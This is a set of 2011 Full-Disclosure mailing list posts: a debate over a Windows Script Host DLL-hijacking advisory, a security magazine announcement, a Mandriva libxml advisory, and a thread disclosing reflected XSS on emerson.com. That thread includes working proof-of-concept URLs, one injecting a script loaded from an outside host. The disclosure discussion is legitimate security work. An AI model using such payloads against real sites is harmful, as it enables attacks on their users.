Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
On Mon, Sep 5, 2011 at 7:45 PM, root wrote: > Off-topic: > > First Insect PRO, and now this? > What's happening fellow Latin-americans? our standards are falling. > Please behave, this is the Internet! > [image: The_Internet_is_Serious_Business - Low.jpg] -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” <>___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
Excellent points - one slight addition, though: >In fact, the Windows Script Host software is mostly used to write system >maintenance scripts, >so it's obvious its scripts can't be restricted or they'd be useless. Scripts can certainly be restricted based on the account context they are executed under. There is actually plenty one can do with "normal user" scripts, but as you've pointed out, many of the options admins require scripts for need escalated privileges. This is obviously be design, and it helps to keep admins aware of best practices when choosing to deploy solutions via scripting. There are, of course, many many other ways once can accomplish system maintenance in a more secure way such as WMI, PS (which can require signed scripts) and of course GPO and/or any other number of solutions. I thought it important to outline that since, in my experience with "real" admins, WSH is actually *not* used mostly for system maintenance per se, but for standard automation. Using scripts to perform actual administrative tasks/maintenance is just a bad idea to begin with. t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
I agree, in some remote scenario this may work, but doesn't justify an advisory. Off-topic: First Insect PRO, and now this? What's happening fellow Latin-americans? our standards are falling. Please behave, this is the Internet! On 09/05/2011 07:33 AM, Mario Vilas wrote: > Paul, > > Those file extensions correspond to scripts. If a file contains a script > that runs when the file is double clicked, and the scripting engine is not > sandboxed (meaning the script can do the same things an executable file can > do) then the attack is meaningless. You can simply have the script inside > the file do malicious things instead of planting a DLL. > > Binary planting, regardless of the discussion about it being a > "vulnerability" or not, in any case only makes sense when the file only > contains static data, or when the file contains executable code that would > normally not have the same privileges as a standard executable file. (A > script that doesn't get executed when double clicking on it -for example if > a text editor is opened instead- would be the same case as in a data file). > > I've never used .js or .jse scripts on Windows, but all the other extensions > are patently not sandboxed scripts. In fact, the Windows Script Host > software is mostly used to write system maintenance scripts, so it's obvious > its scripts can't be restricted or they'd be useless. I'm guessing the same > applies to .js and .jse then, and of course I wouldn't mind seeing proof > that it doesn't. However the links you provided don't really prove anything > (the first one even says "this is not a complete list", and I admit I've > only glanced the second one but it seems unrelated, as it applies to file > transfers on Microsoft Sharepoint). > > Planting a DLL file to be executed at the same time as other executable file > is just a convoluted way of doing the same thing. It *may* be used in some > strange, artificial situations, but I'm not convinced there aren't better > ways to do it, and in any case it doesn't justify an advisory. And judging > from what the timeline reads, I believe Microsoft simply ignored this one. > > I hope my explanation helped :) > -Mario > > On Mon, Sep 5, 2011 at 12:54 AM, wrote: > >>> Application: wscript.exe >>> Extensions: js, jse, vbe, vbs, wsf, wsh >>> Library: wshesn.dll >> >> Many people commented that the above extensions are "executable" >> already, so are (should be) treated with caution, or that they >> can be trojaned directly without any DLL load shenanigans. >> >> However... looking at >> http://technet.microsoft.com/en-us/library/cc288335%28office.12%29.aspx >> >> http://office.microsoft.com/en-us/windows-sharepoint-services-help/types-of-files-that-cannot-be-added-to-a-list-or-library-HA010100147.aspx >> I do not see JS listed as executable, though JSE is listed. >> >> Looking at >> http://msdn.microsoft.com/en-us/library/ms722429.aspx >> I see JS (but not JSE) listed. Checking secpol.msc on my WindowsXP >> machine, none of the above extensions are "designated". >> >> Maybe DLL hijacking is useful for some of these file types, after all? >> >> Cheers, Paul >> >> Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ >> School of Mathematics and Statistics University of SydneyAustralia >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
lol, the japanese ddosed their children and the official version is they tried to entertain them. the official version appears as fuzzing while not knowing doing so. -- joro On Sun, Sep 04, 2011 at 05:34:00PM +, Thor (Hammer of God) wrote: > Something like Pokemon malware would be awesome: > > http://faculty.washington.edu/chudler/pokemon.html > > t > > > -Original Message- > From: Georgi Guninski [mailto:gunin...@guninski.com] > Sent: Sunday, September 04, 2011 9:20 AM > To: valdis.kletni...@vt.edu > Cc: Thor (Hammer of God); full-disclosure@lists.grok.org.uk > Subject: Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host > DLL Hijacking > > On Fri, Sep 02, 2011 at 05:46:15PM -0400, valdis.kletni...@vt.edu wrote: > > > > Prediction 1: 10 years from now, organized crime will be hiring > > cognitive psychologists to help design more effective phish the way > > they currently hire programmers to write better spambots. > > > wouldn't it be more profitable to develop a brain exploit (like what news > write)? > > human brain doesn't seem suited enough for rooted computer output. > > to my knowledge 25th frame is banned in TV. > > if someone *releases* (partial) hypnosis malware this might be profitable and > change the meaning of "botnet". > > -- > joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Announcement] ClubHack Mag Issue 20- September 2011 Released
Hello Readers, here we are with issue20 of ClubHack Mag for the month of September 2011. This time the theme is Malwares. This issue covers following articles:- 0x00 Tech Gyan - Rootkits are Back with the Boot Infection 0x01 Tool Gyan - Tools for Reverse Engineering and Malware Analysis 0x02 Mom's Guide - Introduction to Malware & Malware Analysis 0x03 Legal Gyan - Law relating to Cyber Pornography in India 0x04 Matriux Vibhag - Ostinato - Wireshark in Reverse 0x05 Poster of the Month - Angry Malwares Check http://chmag.in for articles. PDF version can be download from:- http://chmag.in/issue/sep2011.pdf Hope you'll enjoy the magazine. Please send your suggestions, feedback to i...@chmag.in Regards, Abhijeet Patil, Co-Founder, ClubHack Mag URL: http://chmag.in http://clubhack.com Cell: +91-9923800379 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
On Mon, 05 Sep 2011 09:46:23 EDT, "Mr. Hinky Dink" said: > I'm guessing you're a contractor for that particular company because, > after all, no one knows the URL. Google is a subcontractor for them? :) (It's *amazing* how many sites rely on "nobody knows the URL", but the URL in question is known to Google ;) pgpYPboA3l0iq.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
The URL is publically visible in address bar if you open the site on Chrome. Not sure how are you categorizing it as "no one knows the url" Try the "Email this Article" link on the page below: http://www.emerson.com/en-US/newsroom/news-releases/emerson-financial-news/Pages/Emerson-to-Sell-Heating-Products-Business.aspx Madhur On Monday, September 5, 2011, Mr. Hinky Dink wrote: > > That... ahem... particular company has had that particular page > (/MCS/email.apsx) in one form or another for a long time, since the late > 90s at least, when it was a cgi app. > > IIRC, at one time you could SPAM anyone through it, but they learned > their lesson and now you can only SPAM the company's employees. > Considering the business they're in (think "SCADA" related) this could > be a Bad Thing. The XSS is just the icing on the cake. > > I find it interesting that they "upgraded" it to SharePoint. > > It's an in-house app, one of several. I believe the security model used > to be "no one knows the URL". > > I'm guessing you're a contractor for that particular company because, > after all, no one knows the URL. > > On Mon, 2011-09-05 at 02:00 +0530, Madhur Ahuja wrote: > > One of the pages in Emerson site are rendering the query string > > parameter without any inspection. This makes it possible to inject > > malicious content as shown below: > > > > > > > > http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg% > > 20src=' > http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E > > > > > > > > > > > > > > http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=% > > 22http://madhur.github.com/files/js/site.js%22%20type=% > > 22text/javascript%22%3E > > > > > > -- > > Madhur > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
That... ahem... particular company has had that particular page (/MCS/email.apsx) in one form or another for a long time, since the late 90s at least, when it was a cgi app. IIRC, at one time you could SPAM anyone through it, but they learned their lesson and now you can only SPAM the company's employees. Considering the business they're in (think "SCADA" related) this could be a Bad Thing. The XSS is just the icing on the cake. I find it interesting that they "upgraded" it to SharePoint. It's an in-house app, one of several. I believe the security model used to be "no one knows the URL". I'm guessing you're a contractor for that particular company because, after all, no one knows the URL. On Mon, 2011-09-05 at 02:00 +0530, Madhur Ahuja wrote: > One of the pages in Emerson site are rendering the query string > parameter without any inspection. This makes it possible to inject > malicious content as shown below: > > > > http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg% > 20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E > > > > > > > http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=% > 22http://madhur.github.com/files/js/site.js%22%20type=% > 22text/javascript%22%3E > > > -- > Madhur > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:131 ] libxml
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:131 http://www.mandriva.com/security/ ___ Package : libxml Date: September 5, 2011 Affected: 2009.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in libxml/libxml2: Integer overflow in xpath.c in libxml2 2.6.x through 2.6.32 and 2.7.x through 2.7.8, and libxml 1.8.16 and earlier, allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted XML file that triggers a heap-based buffer overflow when adding a new namespace node, related to handling of XPath expressions (CVE-2011-1944). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490 The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1944 ___ Updated Packages: Mandriva Linux 2009.0: 91a56eed57c4c5334b06dfa08cbc71c3 2009.0/i586/libxml1-1.8.17-14.2mdv2009.0.i586.rpm 4b302ddcc4ec729431381b55b2a7f0f5 2009.0/i586/libxml1-devel-1.8.17-14.2mdv2009.0.i586.rpm 07da42454f8b366c4eaad9c3454c0169 2009.0/i586/libxml2_2-2.7.1-1.7mdv2009.0.i586.rpm 2f1a7997a3b3d990beb1920958c5e653 2009.0/i586/libxml2-devel-2.7.1-1.7mdv2009.0.i586.rpm 088b45969e6ed600061f1443d66b8e03 2009.0/i586/libxml2-python-2.7.1-1.7mdv2009.0.i586.rpm 4388c61a1fd0e29253788b5b0ed50b9f 2009.0/i586/libxml2-utils-2.7.1-1.7mdv2009.0.i586.rpm 0832d7b58dff4e3bebe76f32e0c7ce99 2009.0/SRPMS/libxml-1.8.17-14.2mdv2009.0.src.rpm 06353372b3a8416494b67dd4ee0f1124 2009.0/SRPMS/libxml2-2.7.1-1.7mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: a671a890dcfe6acb098b0ef93b3a7277 2009.0/x86_64/lib64xml1-1.8.17-14.2mdv2009.0.x86_64.rpm 8bcf9273a93a4d2d8092b128a3ba9b6b 2009.0/x86_64/lib64xml1-devel-1.8.17-14.2mdv2009.0.x86_64.rpm ca24cc56951cdaad1e91e49aab41b1e0 2009.0/x86_64/lib64xml2_2-2.7.1-1.7mdv2009.0.x86_64.rpm cef2fec84782932f31a33e5ea03296d5 2009.0/x86_64/lib64xml2-devel-2.7.1-1.7mdv2009.0.x86_64.rpm 9d9982274c97538eaea39f84a2e59348 2009.0/x86_64/libxml2-python-2.7.1-1.7mdv2009.0.x86_64.rpm 52af9613cb44df27be47c9ed836f1a62 2009.0/x86_64/libxml2-utils-2.7.1-1.7mdv2009.0.x86_64.rpm 0832d7b58dff4e3bebe76f32e0c7ce99 2009.0/SRPMS/libxml-1.8.17-14.2mdv2009.0.src.rpm 06353372b3a8416494b67dd4ee0f1124 2009.0/SRPMS/libxml2-2.7.1-1.7mdv2009.0.src.rpm Mandriva Linux 2010.1: fe18b539e7c96fd88579e468b61a998d 2010.1/i586/libxml1-1.8.17-16.1mdv2010.2.i586.rpm 613776b0f23dc278ac80a5f55a4895c4 2010.1/i586/libxml1-devel-1.8.17-16.1mdv2010.2.i586.rpm 48a053d4bd69449ad6b946e8c944b6db 2010.1/i586/libxml2_2-2.7.7-1.3mdv2010.2.i586.rpm 2642e7a2bd1f5173581808b8639ce843 2010.1/i586/libxml2-devel-2.7.7-1.3mdv2010.2.i586.rpm 8c438c598bee68ff0014e1d7bb0e2025 2010.1/i586/libxml2-python-2.7.7-1.3mdv2010.2.i586.rpm 4b886076f75ff7e935fff0c0857fad50 2010.1/i586/libxml2-utils-2.7.7-1.3mdv2010.2.i586.rpm 1cd36384a94985bf4d162dc3c9600f07 2010.1/SRPMS/libxml-1.8.17-16.1mdv2010.2.src.rpm 2667d2e2762160cc57742fec24ecb9fe 2010.1/SRPMS/libxml2-2.7.7-1.3mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 5ea2dfe12abf2f3eb7bee79de1ebeeca 2010.1/x86_64/lib64xml1-1.8.17-16.1mdv2010.2.x86_64.rpm 17b07159ee11d98a4960f51d798c85f7 2010.1/x86_64/lib64xml1-devel-1.8.17-16.1mdv2010.2.x86_64.rpm 0bb5a486250b26e842eba791d950037b 2010.1/x86_64/lib64xml2_2-2.7.7-1.3mdv2010.2.x86_64.rpm ca633e675ae7e47374cf08a4317b2a6e 2010.1/x86_64/lib64xml2-devel-2.7.7-1.3mdv2010.2.x86_64.rpm f86f1c06557db0dc16e9c91e3948f1b3 2010.1/x86_64/libxml2-python-2.7.7-1.3mdv2010.2.x86_64.rpm 7643a6230845023113e69a8f8b6823e9 2010.1/x86_64/libxml2-utils-2.7.7-1.3mdv2010.2.x86_64.rpm 1cd36384a94985bf4d162dc3c9600f07 2010.1/SRPMS/libxml-1.8.17-16.1mdv2010.2.src.rpm 2667d2e2762160cc57742fec24ecb9fe 2010.1/SRPMS/libxml2-2.7.7-1.3mdv2010.2.src.rpm Corporate 4.0: 402c97c08d9bf2ba42d0504a8ff33005 corporate/4.0/i586/libxml1-1.8.17-8.2.20060mlcs4.i586.rpm 985da139b830931af9722d0c5d312294 corporate/4.0/i586/libxml1-devel-1.8.17-8.2.20060mlcs4.i586.rpm 43cec07af16e82483b6427b1b3b4332d corporate/4.0/i586/libxml2-2.6.21-3.8.20060mlcs4.i586.rpm d57401514fed3d02a97c6e1f8de9c2ed corporate/4.0/i586/libxml2-devel-2.6.21-3.8.20060mlcs4.i586.rpm 62dc3d0c18468831cabb88f0df1ea876 corporate/4.0/i586/libxml2-python-2.6.21-3.8.20060mlcs4.i586.rpm 9d13363c56340d67f1296
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
Paul, Those file extensions correspond to scripts. If a file contains a script that runs when the file is double clicked, and the scripting engine is not sandboxed (meaning the script can do the same things an executable file can do) then the attack is meaningless. You can simply have the script inside the file do malicious things instead of planting a DLL. Binary planting, regardless of the discussion about it being a "vulnerability" or not, in any case only makes sense when the file only contains static data, or when the file contains executable code that would normally not have the same privileges as a standard executable file. (A script that doesn't get executed when double clicking on it -for example if a text editor is opened instead- would be the same case as in a data file). I've never used .js or .jse scripts on Windows, but all the other extensions are patently not sandboxed scripts. In fact, the Windows Script Host software is mostly used to write system maintenance scripts, so it's obvious its scripts can't be restricted or they'd be useless. I'm guessing the same applies to .js and .jse then, and of course I wouldn't mind seeing proof that it doesn't. However the links you provided don't really prove anything (the first one even says "this is not a complete list", and I admit I've only glanced the second one but it seems unrelated, as it applies to file transfers on Microsoft Sharepoint). Planting a DLL file to be executed at the same time as other executable file is just a convoluted way of doing the same thing. It *may* be used in some strange, artificial situations, but I'm not convinced there aren't better ways to do it, and in any case it doesn't justify an advisory. And judging from what the timeline reads, I believe Microsoft simply ignored this one. I hope my explanation helped :) -Mario On Mon, Sep 5, 2011 at 12:54 AM, wrote: > > Application: wscript.exe > > Extensions: js, jse, vbe, vbs, wsf, wsh > > Library: wshesn.dll > > Many people commented that the above extensions are "executable" > already, so are (should be) treated with caution, or that they > can be trojaned directly without any DLL load shenanigans. > > However... looking at > http://technet.microsoft.com/en-us/library/cc288335%28office.12%29.aspx > > http://office.microsoft.com/en-us/windows-sharepoint-services-help/types-of-files-that-cannot-be-added-to-a-list-or-library-HA010100147.aspx > I do not see JS listed as executable, though JSE is listed. > > Looking at > http://msdn.microsoft.com/en-us/library/ms722429.aspx > I see JS (but not JSE) listed. Checking secpol.msc on my WindowsXP > machine, none of the above extensions are "designated". > > Maybe DLL hijacking is useful for some of these file types, after all? > > Cheers, Paul > > Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ > School of Mathematics and Statistics University of SydneyAustralia > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
